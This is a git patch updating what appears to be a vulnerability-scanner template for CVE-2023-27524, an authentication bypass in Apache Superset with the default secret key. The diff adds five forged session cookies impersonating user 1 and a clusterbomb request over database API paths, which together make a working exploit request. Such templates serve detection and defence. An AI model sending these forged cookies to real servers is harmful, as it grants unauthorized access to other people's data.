From 16de23e95f8fa84d21cff5f1e18f433995573c23 Mon Sep 17 00:00:00 2001
From: M4rtin Hsu <m4rtin.hsu@gmail.com>
Date: Wed, 26 Apr 2023 17:03:59 +0800
Subject: [PATCH] Updated CVE-2023-27524 Template

---
 cves/2023/CVE-2023-27524.yaml | 30 +++++++++++++++++++++++-------
 1 file changed, 23 insertions(+), 7 deletions(-)

diff --git a/cves/2023/CVE-2023-27524.yaml b/cves/2023/CVE-2023-27524.yaml
index daf418efa2..3835f9e1a0 100644
--- a/cves/2023/CVE-2023-27524.yaml
+++ b/cves/2023/CVE-2023-27524.yaml
@@ -2,11 +2,12 @@ id: CVE-2023-27524
 
 info:
   name: Apache Superset - Authentication Bypass
-  author: DhiyaneshDK
+  author: DhiyaneshDK,_0xf4n9x_
   severity: high
   description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.
   reference:
     - https://github.com/horizon3ai/CVE-2023-27524
+    - https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
     - https://nvd.nist.gov/vuln/detail/CVE-2023-27524
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
@@ -21,15 +22,30 @@ info:
 requests:
   - raw:
       - |
-        GET /login/ HTTP/1.1
+        GET /api/v1/database/{{path}} HTTP/1.1
         Host: {{Hostname}}
-        Accept: */*
+        Cookie: session={{session}}
 
-      - |
-        GET /api/v1/database/1 HTTP/1.1
-        Host: {{Hostname}}
-        Cookie: session=eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEfQPg.Enz83rUqMAFfdCds7ClQzlEmScg
+    payloads:
+      path: 
+        - '1'
+        - '2'
+        - '3'
+        - '4'
+        - '5'
+        - '6'
+        - '7'
+        - '9'
+        - '10'
+      session: 
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.RoFeMf1WLNJXDYslf18x9VGxC0Q'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hKV8XXVcD6lWhTIoWs0CjrSRPQQ'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.xtJXBhmJ0k6_oKs8iGhWJK2BjKs'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hRZP41FgqxjaxjJ3WyeIVxyZDng'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.6GpaUB9IP9OnG3HHon3XcdzHWhI'
+    attack: clusterbomb
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word